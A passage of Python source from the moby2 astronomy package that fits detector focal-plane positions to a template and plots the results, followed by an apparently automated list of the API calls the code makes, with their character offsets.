Those params are stored internally, so you can get the model FP:
model_for_target = fitter.get_modeled(my_target_fp)
"""
param_names = ['dx', 'dy', 'theta', 'scale', 'shear_theta', 'shear_scale']
formats = {'dx': '%9.6f',
'dy': '%9.6f',
'scale': '%11.4e',
'n_dets': '%4i',
'theta': '%9.6f',
'shear_scale': '%11.4e',
'shear_theta': '%9.6f',
}
@classmethod
def from_params(cls, opts, tod_info=None):
if '_execcfg' in opts:
tod_id = moby2.scripting.products.get_tod_id(tod_info=tod_info)
ic = moby2.scripting.execcfg.InputChooser()
opts1 = ic.get_config(opts['_execcfg'], tod_id=tod_id)
for k,v in list(opts1.items()):
if not k in opts:
opts[k] = v
if 'depot' in opts:
depot = moby2.scripting.get_depot(opts['depot'])
if not 'structure' in opts:
opts['structure'] = '{tag}'
filename = depot.get_full_path(**opts)
else:
filename = opts['filename']
trace(2, 'Loading as template: %s' % filename)
load_args = opts['column_def']
pos_data = moby2.util.StructDB.from_column_file(filename, load_args)
r = opts.get('template_rescale', (1.,1.))
if 'ok' in pos_data.dtype.names:
mask = (pos_data['ok'].astype(int) != 0)
else:
mask = np.ones(pos_data['x'].shape, bool)
template_fits = FPFitFile(det_uid=pos_data['det_uid'][mask])
template_fits.x0[:] = pos_data['x'][mask] * r[0]
template_fits.y0[:] = pos_data['y'][mask] * r[1]
template_fits.ok[:] = True
self = cls()
self.set_template(template_fits)
return self
def set_template(self, template):
self.template = template
self.pivot = self.template.x0[self.template.ok].mean(), \
self.template.y0[self.template.ok].mean()
@staticmethod
def _rotate(theta, x, y):
c, s = np.cos(theta), np.sin(theta)
return x*c - y*s, y*c + x*s
def model(self, params, x=None, y=None):
"""
Shift, rotate, shear the current template according to params
dict. Return the resulting offsets (x, y).
"""
dx, dy, theta, scale, sh_theta, sh_scale = params
scale, sh_scale = np.exp(scale), np.exp(sh_scale)
# Shift away array center and rescale
if x is None:
tp = self.template
x, y = tp.x0, tp.y0
out_x, out_y = scale*(x - self.pivot[0]), scale*(y - self.pivot[1])
# Shear
out_x, out_y = self._rotate(+sh_theta, out_x, out_y)
out_x *= sh_scale
out_x, out_y = self._rotate(-sh_theta, out_x, out_y)
# Rotate
out_x, out_y = self._rotate(theta, out_x, out_y)
# Restore array center and apply additional shift.
return out_x + self.pivot[0] - dx, out_y + self.pivot[1] - dy
def model_inverse(self, params, out_x, out_y):
"""
Inverse of self.model. Keep it up to date!
"""
dx, dy, theta, scale, sh_theta, sh_scale = params
scale, sh_scale = np.exp(scale), np.exp(sh_scale)
# Remove additional shift.
x, y = out_x - self.pivot[0] + dx, out_y - self.pivot[1] + dy
# Unrotate
x, y = self._rotate(-theta, x, y)
# Unshear
x, y = self._rotate(+sh_theta, x, y)
x /= sh_scale
x, y = self._rotate(-sh_theta, x, y)
x, y = x/scale + self.pivot[0], y/scale + self.pivot[1]
return x, y
def fit(self, fp, params, trace_level=0):
"""
Fit positions to a template, which is also an FPFitFile but
may represent different det_uid. 'params' should be a dict
like this one:
params = {
'shift': True,
'rotation': True,
'scale': True,
'shear': True,
}
Returns (ok, params). The fitted_template has the same
det_uid as self.
"""
template = self.template
# Get mask of items that are ok in both the template and fits
fp_ok = fp.ok.astype('bool').copy()
_, temp_ok = template.get_property('ok', fp.det_uid)
fp_ok *= temp_ok
# Get the template and fits positions for those ok items
_, x0 = template.get_property('x0', fp.det_uid[fp_ok])
_, y0 = template.get_property('y0', fp.det_uid[fp_ok])
x1, y1 = fp.x0[fp_ok], fp.y0[fp_ok]
self.A = x0,y0
self.B = x1,y1
# Identify parameters we want to vary
free_params = [params.get('shift', True)]*2
free_params.append(params.get('rotation', True))
free_params.append(params.get('scale', False))
free_params.extend([params.get('shear', False)]*2)
if fp.ok.sum() == 0:
trace(trace_level+0, 'No items for template fit')
self.result = False, [0. for f in free_params]
return self.result
trace(trace_level+0, 'Fitting template using %i items' % fp_ok.sum())
# Start fit with shift based on mean displacement
params0 = [x1.mean()-self.pivot[0], y1.mean()-self.pivot[1],
0., 0., 0., 0.]
trace(trace_level+1, 'Starting parameters: %s' % str(params0))
trace(trace_level+1, 'Free parameters: %s' % str(free_params))
def fit_chi2(params):
x_model, y_model = self.model(params, x0, y0)
var = (x1 - x_model)**2 + (y1 - y_model)**2
#return var.sum()
# Attenuate contribution of outliers? Not clear this works...
mvar = np.median(var)
var_roll = var * (10*mvar / (10*mvar + var))
return var_roll.sum()
# Minimize... start with position or all is lost.
params1 = params0
for iters in [0,1]:
for free_mask in [
# Fit position only...
[True , True , False, False, False, False],
# Fit rotation and scale
[False, False, True , True , False, False],
# Fit skew
[False, False, False, False, True , True ],
# Fit skew and position
[True , True , False, False, True , True ],
# Let everything float
[True , True , True , True , True , True ]]:
free = np.array(free_params) * free_mask
if free.sum() > 0:
params1 = moby2.util.fitting.multi_fmin(
fit_chi2, params1, free=free, disp=0,
xtol=1e-6, ftol=1e-6)
trace(trace_level+2, 'params snapshot: %s' % str(params1))
trace(trace_level+1, 'Final parameters: %s' % str(params1))
self.result = True, params1
return self.result
def check_result(self, opts):
"""
Check self.result against ranges passed in by user. User
passes in a dict with keys like "<name>_range", where <name>
is one of self.param_names. The values are the range (lo, hi) of
acceptable values. If any range checks fail, the function
returns false.
"""
ok, params = self.result
if not ok:
return False
for k, v in zip(self.param_names, params):
k = '%s_range' % k
if not k in opts: continue
if not ((opts[k][0] <= v) and (v < opts[k][1])):
return False
return True
def get_modeled(self, det_uid=None):
"""
Return a FPFitFile with the modeled detector positions. Pass
in the desired det_uid, or the template det_uid will be
used.
"""
if det_uid is None:
det_uid = self.det_uid
matched = FPFitFile(det_uid=det_uid)
_, ok = self.template.get_property('ok', matched.det_uid)
_, x0 = self.template.get_property('x0', matched.det_uid)
_, y0 = self.template.get_property('y0', matched.det_uid)
matched.ok = ok
params = self.result[1]
matched.x0, matched.y0 = self.model(params, x0, y0)
return matched
def make_plots(self, fp, modeled, plot_prefix='./',
title=None):
"""
Show fit quality in a few plots.
"""
import pylab as pl
def sane_axes():
fig.gca().xaxis.set_major_locator(pl.MaxNLocator(4))
fig.gca().yaxis.set_major_locator(pl.MaxNLocator(5))
fig.gca().set_aspect('equal', 'datalim')
DEG = 180./np.pi
fig = pl.figure()
fig.set_size_inches(8., 4.)
pl.subplots_adjust(left=.1, right=.98, top=.85, bottom=.1,
hspace=.2, wspace=.3)
pl.subplot(121)
tp = self.template
s, x, y = tp.ok, tp.x0, tp.y0
pl.scatter(x[s], y[s], marker='o', s=4, alpha=.5)
pl.xlabel('X')
pl.ylabel('Y')
pl.title('Input template')
sane_axes()
# The model positions
pl.subplot(122)
s, x, y = modeled.ok, modeled.x0 * DEG, modeled.y0 * DEG
pl.scatter(x[s], y[s], alpha=.2)
# And the fit positions
s, x, y = fp.ok, fp.x0 * DEG, fp.y0 * DEG
pl.scatter(x[s], y[s], marker='x')
# Now connect them with lines...
u = fp.det_uid[s]
ok1, (x1, y1) = modeled.get_property(['x0','y0'], det_uid=u)
x, y = x[s], y[s]
for i in ok1.nonzero()[0]:
pl.plot([x1[i]*DEG, x[i]], [y1[i]*DEG, y[i]], color='k', alpha=.4)
pl.xlabel('X (deg)')
pl.ylabel('Y (deg)')
pl.title('Fitted result')
sane_axes()
if title != None:
pl.figtext(0.5, 0.93, title, va='bottom', ha='center')
pl.savefig(plot_prefix + 'fit.png')
pl.figure() # destroy our settings...
def old_make_plots(self, fp, modeled, plot_prefix='./',
title=None):
"""
Show fit quality in a few plots.
"""
import pylab as pl
DEG = 180./np.pi
pl.figure()
pl.gcf().set_size_inches(6., 6.)
pl.subplots_adjust(left=.15, right=.95, top=.90, bottom=.1,
hspace=.2, wspace=.3)
tp = self.template
s, x, y = tp.ok, tp.x0, tp.y0
pl.scatter(x[s], y[s], marker='x')
pl.savefig(plot_prefix + '0template.png')
pl.clf()
s, x, y = modeled.ok, modeled.x0 * DEG, modeled.y0 * DEG
pl.scatter(x[s], y[s], alpha=.2)
pl.xlabel('X (deg)')
pl.ylabel('Y (deg)')
pl.savefig(plot_prefix + '1model.png')
pl.clf()
# The model positions
s, x, y = modeled.ok, modeled.x0 * DEG, modeled.y0 * DEG
pl.scatter(x[s], y[s], alpha=.2)
# And the fit positions
s, x, y = fp.ok, fp.x0 * DEG, fp.y0 * DEG
pl.scatter(x[s], y[s], marker='x')
# Now connect them with lines...
u = fp.det_uid[s]
ok1, (x1, y1) = modeled.get_property(['x0','y0'], det_uid=u)
x, y = x[s], y[s]
for i in ok1.nonzero()[0]:
pl.plot([x1[i]*DEG, x[i]], [y1[i]*DEG, y[i]], color='k', alpha=.4)
pl.xlabel('X (deg)')
pl.ylabel('Y (deg)')
if title is not None:
pl.title(title)
pl.savefig(plot_prefix + '2fit.png')
pl.figure() # destroy our settings...
# Formatted output...
def get_ascii(self, names=None, params=None):
if names is None:
names = self.param_names
if params is None:
params = self.result[1]
idx = [self.param_names.index(f) for f in names]
text = [ self.formats.get(n, '%11.4e') % params[i]
for n,i in zip(names,idx) ]
return ' '.join(text)
@staticmethod
def write_fit_list(filename, keys, fits, format=None):
if format == 'fits':
columns = list(zip(*[f.result[1] for f in fits]))
col_defs = ([('id', keys), ('ok', [int(f.result[0]) for f in fits])] +
list(zip(fits[0].param_names, columns)))
db_out = moby2.util.StructDB.from_data(
col_defs, formats=fits[0].formats)
db_out.to_fits_table(filename)
else:
if isinstance(filename, basestring):
filename = open(filename, 'w')
names = fits[0].param_names
filename.write('# %s\n' % ' '.join(names))
for key, fit in zip(keys, fits):
text = fit.get_ascii(names=names)
filename.write('%s %s\n' % (key, text))
| [
"pylab.title",
"pylab.scatter",
"numpy.log10",
"pylab.subplots_adjust",
"moby2.scripting.get_depot",
"pylab.MaxNLocator",
"pylab.savefig",
"pylab.xlabel",
"moby2.scripting.execcfg.InputChooser",
"numpy.array",
"numpy.sin",
"moby2.util.StructDB.from_column_file",
"pylab.gca",
"numpy.arange"... | [((1905, 1935), 'numpy.loadtxt', 'np.loadtxt', (['filename'], {'unpack': '(1)'}), '(filename, unpack=1)\n', (1915, 1935), True, 'import numpy as np\n'), ((3620, 3676), 'moby2.util.StructDB.from_data', 'moby2.util.StructDB.from_data', (['data'], {'formats': '_fp_formats'}), '(data, formats=_fp_formats)\n', (3649, 3676), False, 'import moby2\n'), ((4358, 4469), 'moby2.util.StructDB.from_data', 'moby2.util.StructDB.from_data', (['data'], {'formats': "{'peak_dac': '%12.3f', 'time_const': '%12.5f', 'sn': '%12.3f'}"}), "(data, formats={'peak_dac': '%12.3f',\n 'time_const': '%12.5f', 'sn': '%12.3f'})\n", (4387, 4469), False, 'import moby2\n'), ((4935, 4958), 'numpy.zeros', 'np.zeros', (['self.ok.shape'], {}), '(self.ok.shape)\n', (4943, 4958), True, 'import numpy as np\n'), ((9370, 9397), 'pylab.scatter', 'pl.scatter', (['x', 'y'], {'alpha': '(0.5)'}), '(x, y, alpha=0.5)\n', (9380, 9397), True, 'import pylab as pl\n'), ((9894, 9921), 'pylab.xlabel', 'pl.xlabel', (["('X (%s)' % units)"], {}), "('X (%s)' % units)\n", (9903, 9921), True, 'import pylab as pl\n'), ((9930, 9957), 'pylab.ylabel', 'pl.ylabel', (["('Y (%s)' % units)"], {}), "('Y (%s)' % units)\n", (9939, 9957), True, 'import pylab as pl\n'), ((10528, 10548), 'pylab.savefig', 'pl.savefig', (['filename'], {}), '(filename)\n', (10538, 10548), True, 'import pylab as pl\n'), ((10557, 10565), 'pylab.clf', 'pl.clf', ([], {}), '()\n', (10563, 10565), True, 'import pylab as pl\n'), ((10574, 10585), 'pylab.figure', 'pl.figure', ([], {}), '()\n', (10583, 10585), True, 'import pylab as pl\n'), ((11714, 11725), 'pylab.figure', 'pl.figure', ([], {}), '()\n', (11723, 11725), True, 'import pylab as pl\n'), ((11775, 11865), 'pylab.subplots_adjust', 'pl.subplots_adjust', ([], {'left': '(0.1)', 'right': '(0.95)', 'top': '(0.95)', 'bottom': '(0.1)', 'hspace': '(0.2)', 'wspace': '(0.3)'}), '(left=0.1, right=0.95, top=0.95, bottom=0.1, hspace=0.2,\n wspace=0.3)\n', (11793, 11865), True, 'import pylab as pl\n'), ((11952, 11971), 'pylab.subplot', 'pl.subplot', (['(2)', '(2)', '(1)'], {}), '(2, 2, 1)\n', (11962, 11971), True, 'import pylab as pl\n'), ((12073, 12086), 'pylab.colorbar', 'pl.colorbar', ([], {}), '()\n', (12084, 12086), True, 'import pylab as pl\n'), ((12112, 12162), 'pylab.title', 'pl.title', (['"""Time constants (ms)"""'], {'fontsize': 'title_fs'}), "('Time constants (ms)', fontsize=title_fs)\n", (12120, 12162), True, 'import pylab as pl\n'), ((12198, 12217), 'pylab.subplot', 'pl.subplot', (['(2)', '(2)', '(2)'], {}), '(2, 2, 2)\n', (12208, 12217), True, 'import pylab as pl\n'), ((12323, 12336), 'pylab.colorbar', 'pl.colorbar', ([], {}), '()\n', (12334, 12336), True, 'import pylab as pl\n'), ((12362, 12418), 'pylab.title', 'pl.title', (['"""Time constant errors (ms)"""'], {'fontsize': 'title_fs'}), "('Time constant errors (ms)', fontsize=title_fs)\n", (12370, 12418), True, 'import pylab as pl\n'), ((12855, 12894), 'pylab.savefig', 'pl.savefig', (["(filename + 'time_const.png')"], {}), "(filename + 'time_const.png')\n", (12865, 12894), True, 'import pylab as pl\n'), ((12901, 12909), 'pylab.clf', 'pl.clf', ([], {}), '()\n', (12907, 12909), True, 'import pylab as pl\n'), ((13370, 13389), 'pylab.subplot', 'pl.subplot', (['(2)', '(2)', '(3)'], {}), '(2, 2, 3)\n', (13380, 13389), True, 'import pylab as pl\n'), ((13470, 13483), 'pylab.colorbar', 'pl.colorbar', ([], {}), '()\n', (13481, 13483), True, 'import pylab as pl\n'), ((13518, 13554), 'pylab.title', 'pl.title', (['"""N_obs"""'], {'fontsize': 'title_fs'}), "('N_obs', fontsize=title_fs)\n", (13526, 13554), True, 'import pylab as pl\n'), ((13564, 13602), 'pylab.savefig', 'pl.savefig', (["(filename + 'positions.png')"], {}), "(filename + 'positions.png')\n", (13574, 13602), True, 'import pylab as pl\n'), ((13609, 13617), 'pylab.clf', 'pl.clf', ([], {}), '()\n', (13615, 13617), True, 'import pylab as pl\n'), ((13669, 13680), 'pylab.figure', 'pl.figure', ([], {}), '()\n', (13678, 13680), True, 'import pylab as pl\n'), ((15252, 15309), 'moby2.util.StructDB.from_column_file', 'moby2.util.StructDB.from_column_file', (['filename', 'load_args'], {}), '(filename, load_args)\n', (15288, 15309), False, 'import moby2\n'), ((22738, 22749), 'pylab.figure', 'pl.figure', ([], {}), '()\n', (22747, 22749), True, 'import pylab as pl\n'), ((22794, 22884), 'pylab.subplots_adjust', 'pl.subplots_adjust', ([], {'left': '(0.1)', 'right': '(0.98)', 'top': '(0.85)', 'bottom': '(0.1)', 'hspace': '(0.2)', 'wspace': '(0.3)'}), '(left=0.1, right=0.98, top=0.85, bottom=0.1, hspace=0.2,\n wspace=0.3)\n', (22812, 22884), True, 'import pylab as pl\n'), ((22910, 22925), 'pylab.subplot', 'pl.subplot', (['(121)'], {}), '(121)\n', (22920, 22925), True, 'import pylab as pl\n'), ((22999, 23049), 'pylab.scatter', 'pl.scatter', (['x[s]', 'y[s]'], {'marker': '"""o"""', 's': '(4)', 'alpha': '(0.5)'}), "(x[s], y[s], marker='o', s=4, alpha=0.5)\n", (23009, 23049), True, 'import pylab as pl\n'), ((23057, 23071), 'pylab.xlabel', 'pl.xlabel', (['"""X"""'], {}), "('X')\n", (23066, 23071), True, 'import pylab as pl\n'), ((23080, 23094), 'pylab.ylabel', 'pl.ylabel', (['"""Y"""'], {}), "('Y')\n", (23089, 23094), True, 'import pylab as pl\n'), ((23103, 23129), 'pylab.title', 'pl.title', (['"""Input template"""'], {}), "('Input template')\n", (23111, 23129), True, 'import pylab as pl\n'), ((23189, 23204), 'pylab.subplot', 'pl.subplot', (['(122)'], {}), '(122)\n', (23199, 23204), True, 'import pylab as pl\n'), ((23278, 23311), 'pylab.scatter', 'pl.scatter', (['x[s]', 'y[s]'], {'alpha': '(0.2)'}), '(x[s], y[s], alpha=0.2)\n', (23288, 23311), True, 'import pylab as pl\n'), ((23401, 23435), 'pylab.scatter', 'pl.scatter', (['x[s]', 'y[s]'], {'marker': '"""x"""'}), "(x[s], y[s], marker='x')\n", (23411, 23435), True, 'import pylab as pl\n'), ((23720, 23740), 'pylab.xlabel', 'pl.xlabel', (['"""X (deg)"""'], {}), "('X (deg)')\n", (23729, 23740), True, 'import pylab as pl\n'), ((23749, 23769), 'pylab.ylabel', 'pl.ylabel', (['"""Y (deg)"""'], {}), "('Y (deg)')\n", (23758, 23769), True, 'import pylab as pl\n'), ((23778, 23803), 'pylab.title', 'pl.title', (['"""Fitted result"""'], {}), "('Fitted result')\n", (23786, 23803), True, 'import pylab as pl\n'), ((23927, 23962), 'pylab.savefig', 'pl.savefig', (["(plot_prefix + 'fit.png')"], {}), "(plot_prefix + 'fit.png')\n", (23937, 23962), True, 'import pylab as pl\n'), ((23971, 23982), 'pylab.figure', 'pl.figure', ([], {}), '()\n', (23980, 23982), True, 'import pylab as pl\n'), ((24227, 24238), 'pylab.figure', 'pl.figure', ([], {}), '()\n', (24236, 24238), True, 'import pylab as pl\n'), ((24288, 24378), 'pylab.subplots_adjust', 'pl.subplots_adjust', ([], {'left': '(0.15)', 'right': '(0.95)', 'top': '(0.9)', 'bottom': '(0.1)', 'hspace': '(0.2)', 'wspace': '(0.3)'}), '(left=0.15, right=0.95, top=0.9, bottom=0.1, hspace=0.2,\n wspace=0.3)\n', (24306, 24378), True, 'import pylab as pl\n'), ((24470, 24504), 'pylab.scatter', 'pl.scatter', (['x[s]', 'y[s]'], {'marker': '"""x"""'}), "(x[s], y[s], marker='x')\n", (24480, 24504), True, 'import pylab as pl\n'), ((24513, 24554), 'pylab.savefig', 'pl.savefig', (["(plot_prefix + '0template.png')"], {}), "(plot_prefix + '0template.png')\n", (24523, 24554), True, 'import pylab as pl\n'), ((24563, 24571), 'pylab.clf', 'pl.clf', ([], {}), '()\n', (24569, 24571), True, 'import pylab as pl\n'), ((24646, 24679), 'pylab.scatter', 'pl.scatter', (['x[s]', 'y[s]'], {'alpha': '(0.2)'}), '(x[s], y[s], alpha=0.2)\n', (24656, 24679), True, 'import pylab as pl\n'), ((24687, 24707), 'pylab.xlabel', 'pl.xlabel', (['"""X (deg)"""'], {}), "('X (deg)')\n", (24696, 24707), True, 'import pylab as pl\n'), ((24716, 24736), 'pylab.ylabel', 'pl.ylabel', (['"""Y (deg)"""'], {}), "('Y (deg)')\n", (24725, 24736), True, 'import pylab as pl\n'), ((24745, 24783), 'pylab.savefig', 'pl.savefig', (["(plot_prefix + '1model.png')"], {}), "(plot_prefix + '1model.png')\n", (24755, 24783), True, 'import pylab as pl\n'), ((24792, 24800), 'pylab.clf', 'pl.clf', ([], {}), '()\n', (24798, 24800), True, 'import pylab as pl\n'), ((24905, 24938), 'pylab.scatter', 'pl.scatter', (['x[s]', 'y[s]'], {'alpha': '(0.2)'}), '(x[s], y[s], alpha=0.2)\n', (24915, 24938), True, 'import pylab as pl\n'), ((25028, 25062), 'pylab.scatter', 'pl.scatter', (['x[s]', 'y[s]'], {'marker': '"""x"""'}), "(x[s], y[s], marker='x')\n", (25038, 25062), True, 'import pylab as pl\n'), ((25347, 25367), 'pylab.xlabel', 'pl.xlabel', (['"""X (deg)"""'], {}), "('X (deg)')\n", (25356, 25367), True, 'import pylab as pl\n'), ((25376, 25396), 'pylab.ylabel', 'pl.ylabel', (['"""Y (deg)"""'], {}), "('Y (deg)')\n", (25385, 25396), True, 'import pylab as pl\n'), ((25463, 25499), 'pylab.savefig', 'pl.savefig', (["(plot_prefix + '2fit.png')"], {}), "(plot_prefix + '2fit.png')\n", (25473, 25499), True, 'import pylab as pl\n'), ((25508, 25519), 'pylab.figure', 'pl.figure', ([], {}), '()\n', (25517, 25519), True, 'import pylab as pl\n'), ((1340, 1372), 'numpy.array', 'np.array', (['det_uid'], {'dtype': '"""int64"""'}), "(det_uid, dtype='int64')\n", (1348, 1372), True, 'import numpy as np\n'), ((6684, 6704), 'numpy.arange', 'np.arange', (['n_det_uid'], {}), '(n_det_uid)\n', (6693, 6704), True, 'import numpy as np\n'), ((8769, 8780), 'pylab.figure', 'pl.figure', ([], {}), '()\n', (8778, 8780), True, 'import pylab as pl\n'), ((8852, 8873), 'pylab.figure', 'pl.figure', (['fig.number'], {}), '(fig.number)\n', (8861, 8873), True, 'import pylab as pl\n'), ((8932, 8967), 'pylab.title', 'pl.title', (["(title + ' - no good fits')"], {}), "(title + ' - no good fits')\n", (8940, 8967), True, 'import pylab as pl\n'), ((8980, 9000), 'pylab.savefig', 'pl.savefig', (['filename'], {}), '(filename)\n', (8990, 9000), True, 'import pylab as pl\n'), ((9013, 9021), 'pylab.clf', 'pl.clf', ([], {}), '()\n', (9019, 9021), True, 'import pylab as pl\n'), ((9209, 9221), 'numpy.median', 'np.median', (['x'], {}), '(x)\n', (9218, 9221), True, 'import numpy as np\n'), ((9223, 9235), 'numpy.median', 'np.median', (['y'], {}), '(y)\n', (9232, 9235), True, 'import numpy as np\n'), ((9293, 9305), 'numpy.median', 'np.median', (['r'], {}), '(r)\n', (9302, 9305), True, 'import numpy as np\n'), ((9454, 9468), 'numpy.any', 'np.any', (['inside'], {}), '(inside)\n', (9460, 9468), True, 'import numpy as np\n'), ((10365, 10402), 'pylab.MultipleLocator', 'pl.MultipleLocator', (['(10 ** log_spacing)'], {}), '(10 ** log_spacing)\n', (10383, 10402), True, 'import pylab as pl\n'), ((10810, 10874), 'pylab.scatter', 'pl.scatter', (['cols[bads]', 'rows[bads]'], {'marker': '"""x"""', 'edgecolor': '"""gray"""'}), "(cols[bads], rows[bads], marker='x', edgecolor='gray')\n", (10820, 10874), True, 'import pylab as pl\n'), ((11217, 11250), 'numpy.zeros', 'np.zeros', (['(n_rows, n_cols)', 'dtype'], {}), '((n_rows, n_cols), dtype)\n', (11225, 11250), True, 'import numpy as np\n'), ((11400, 11419), 'pylab.xlabel', 'pl.xlabel', (['"""Column"""'], {}), "('Column')\n", (11409, 11419), True, 'import pylab as pl\n'), ((11432, 11448), 'pylab.ylabel', 'pl.ylabel', (['"""Row"""'], {}), "('Row')\n", (11441, 11448), True, 'import pylab as pl\n'), ((11461, 11488), 'pylab.xlim', 'pl.xlim', (['(-0.5)', '(n_cols - 0.5)'], {}), '(-0.5, n_cols - 0.5)\n', (11468, 11488), True, 'import pylab as pl\n'), ((11499, 11526), 'pylab.ylim', 'pl.ylim', (['(-0.5)', '(n_rows - 0.5)'], {}), '(-0.5, n_rows - 0.5)\n', (11506, 11526), True, 'import pylab as pl\n'), ((12489, 12508), 'pylab.subplot', 'pl.subplot', (['(2)', '(2)', '(3)'], {}), '(2, 2, 3)\n', (12499, 12508), True, 'import pylab as pl\n'), ((12519, 12563), 'pylab.hist', 'pl.hist', (['(self.tau[self.ok] * 1000.0)'], {'bins': '(20)'}), '(self.tau[self.ok] * 1000.0, bins=20)\n', (12526, 12563), True, 'import pylab as pl\n'), ((12598, 12629), 'pylab.xlabel', 'pl.xlabel', (['"""Time constant (ms)"""'], {}), "('Time constant (ms)')\n", (12607, 12629), True, 'import pylab as pl\n'), ((12642, 12661), 'pylab.ylabel', 'pl.ylabel', (['"""N_dets"""'], {}), "('N_dets')\n", (12651, 12661), True, 'import pylab as pl\n'), ((12674, 12693), 'pylab.subplot', 'pl.subplot', (['(2)', '(2)', '(4)'], {}), '(2, 2, 4)\n', (12684, 12693), True, 'import pylab as pl\n'), ((12775, 12813), 'pylab.xlabel', 'pl.xlabel', (['"""Time constant errors (ms)"""'], {}), "('Time constant errors (ms)')\n", (12784, 12813), True, 'import pylab as pl\n'), ((12826, 12845), 'pylab.ylabel', 'pl.ylabel', (['"""N_dets"""'], {}), "('N_dets')\n", (12835, 12845), True, 'import pylab as pl\n'), ((12988, 13011), 'pylab.subplot', 'pl.subplot', (['(2)', '(2)', '(1 + i)'], {}), '(2, 2, 1 + i)\n', (12998, 13011), True, 'import pylab as pl\n'), ((13194, 13207), 'pylab.colorbar', 'pl.colorbar', ([], {}), '()\n', (13205, 13207), True, 'import pylab as pl\n'), ((13271, 13343), 'pylab.title', 'pl.title', (["('%s position RMS' % {(0): 'X', (1): 'Y'}[i])"], {'fontsize': 'title_fs'}), "('%s position RMS' % {(0): 'X', (1): 'Y'}[i], fontsize=title_fs)\n", (13279, 13343), True, 'import pylab as pl\n'), ((14570, 14624), 'moby2.scripting.products.get_tod_id', 'moby2.scripting.products.get_tod_id', ([], {'tod_info': 'tod_info'}), '(tod_info=tod_info)\n', (14605, 14624), False, 'import moby2\n'), ((14642, 14680), 'moby2.scripting.execcfg.InputChooser', 'moby2.scripting.execcfg.InputChooser', ([], {}), '()\n', (14678, 14680), False, 'import moby2\n'), ((14907, 14947), 'moby2.scripting.get_depot', 'moby2.scripting.get_depot', (["opts['depot']"], {}), "(opts['depot'])\n", (14932, 14947), False, 'import moby2\n'), ((15488, 15522), 'numpy.ones', 'np.ones', (["pos_data['x'].shape", 'bool'], {}), "(pos_data['x'].shape, bool)\n", (15495, 15522), True, 'import numpy as np\n'), ((16080, 16093), 'numpy.cos', 'np.cos', (['theta'], {}), '(theta)\n', (16086, 16093), True, 'import numpy as np\n'), ((16095, 16108), 'numpy.sin', 'np.sin', (['theta'], {}), '(theta)\n', (16101, 16108), True, 'import numpy as np\n'), ((16425, 16438), 'numpy.exp', 'np.exp', (['scale'], {}), '(scale)\n', (16431, 16438), True, 'import numpy as np\n'), ((16440, 16456), 'numpy.exp', 'np.exp', (['sh_scale'], {}), '(sh_scale)\n', (16446, 16456), True, 'import numpy as np\n'), ((17243, 17256), 'numpy.exp', 'np.exp', (['scale'], {}), '(scale)\n', (17249, 17256), True, 'import numpy as np\n'), ((17258, 17274), 'numpy.exp', 'np.exp', (['sh_scale'], {}), '(sh_scale)\n', (17264, 17274), True, 'import numpy as np\n'), ((19773, 19787), 'numpy.median', 'np.median', (['var'], {}), '(var)\n', (19782, 19787), True, 'import numpy as np\n'), ((23645, 23716), 'pylab.plot', 'pl.plot', (['[x1[i] * DEG, x[i]]', '[y1[i] * DEG, y[i]]'], {'color': '"""k"""', 'alpha': '(0.4)'}), "([x1[i] * DEG, x[i]], [y1[i] * DEG, y[i]], color='k', alpha=0.4)\n", (23652, 23716), True, 'import pylab as pl\n'), ((23863, 23917), 'pylab.figtext', 'pl.figtext', (['(0.5)', '(0.93)', 'title'], {'va': '"""bottom"""', 'ha': '"""center"""'}), "(0.5, 0.93, title, va='bottom', ha='center')\n", (23873, 23917), True, 'import pylab as pl\n'), ((25272, 25343), 'pylab.plot', 'pl.plot', (['[x1[i] * DEG, x[i]]', '[y1[i] * DEG, y[i]]'], {'color': '"""k"""', 'alpha': '(0.4)'}), "([x1[i] * DEG, x[i]], [y1[i] * DEG, y[i]], color='k', alpha=0.4)\n", (25279, 25343), True, 'import pylab as pl\n'), ((25439, 25454), 'pylab.title', 'pl.title', (['title'], {}), '(title)\n', (25447, 25454), True, 'import pylab as pl\n'), ((26281, 26345), 'moby2.util.StructDB.from_data', 'moby2.util.StructDB.from_data', (['col_defs'], {'formats': 'fits[0].formats'}), '(col_defs, formats=fits[0].formats)\n', (26310, 26345), False, 'import moby2\n'), ((7539, 7551), 'numpy.median', 'np.median', (['x'], {}), '(x)\n', (7548, 7551), True, 'import numpy as np\n'), ((7553, 7565), 'numpy.median', 'np.median', (['y'], {}), '(y)\n', (7562, 7565), True, 'import numpy as np\n'), ((9781, 9796), 'pylab.xlim', 'pl.xlim', (['*xlims'], {}), '(*xlims)\n', (9788, 9796), True, 'import pylab as pl\n'), ((9798, 9813), 'pylab.ylim', 'pl.ylim', (['*ylims'], {}), '(*ylims)\n', (9805, 9813), True, 'import pylab as pl\n'), ((10461, 10469), 'pylab.gca', 'pl.gca', ([], {}), '()\n', (10467, 10469), True, 'import pylab as pl\n'), ((10501, 10509), 'pylab.gca', 'pl.gca', ([], {}), '()\n', (10507, 10509), True, 'import pylab as pl\n'), ((11734, 11742), 'pylab.gcf', 'pl.gcf', ([], {}), '()\n', (11740, 11742), True, 'import pylab as pl\n'), ((22561, 22578), 'pylab.MaxNLocator', 'pl.MaxNLocator', (['(4)'], {}), '(4)\n', (22575, 22578), True, 'import pylab as pl\n'), ((22626, 22643), 'pylab.MaxNLocator', 'pl.MaxNLocator', (['(5)'], {}), '(5)\n', (22640, 22643), True, 'import pylab as pl\n'), ((24247, 24255), 'pylab.gcf', 'pl.gcf', ([], {}), '()\n', (24253, 24255), True, 'import pylab as pl\n'), ((8793, 8801), 'pylab.gcf', 'pl.gcf', ([], {}), '()\n', (8799, 8801), True, 'import pylab as pl\n'), ((20533, 20554), 'numpy.array', 'np.array', (['free_params'], {}), '(free_params)\n', (20541, 20554), True, 'import numpy as np\n'), ((20632, 20728), 'moby2.util.fitting.multi_fmin', 'moby2.util.fitting.multi_fmin', (['fit_chi2', 'params1'], {'free': 'free', 'disp': '(0)', 'xtol': '(1e-06)', 'ftol': '(1e-06)'}), '(fit_chi2, params1, free=free, disp=0, xtol=\n 1e-06, ftol=1e-06)\n', (20661, 20728), False, 'import moby2\n'), ((7211, 7223), 'numpy.isnan', 'np.isnan', (['_x'], {}), '(_x)\n', (7219, 7223), True, 'import numpy as np\n'), ((7227, 7239), 'numpy.isinf', 'np.isinf', (['_x'], {}), '(_x)\n', (7235, 7239), True, 'import numpy as np\n'), ((10298, 10309), 'numpy.log10', 'np.log10', (['b'], {}), '(b)\n', (10306, 10309), True, 'import numpy as np\n'), ((10265, 10280), 'numpy.log10', 'np.log10', (['delta'], {}), '(delta)\n', (10273, 10280), True, 'import numpy as np\n'), ((10283, 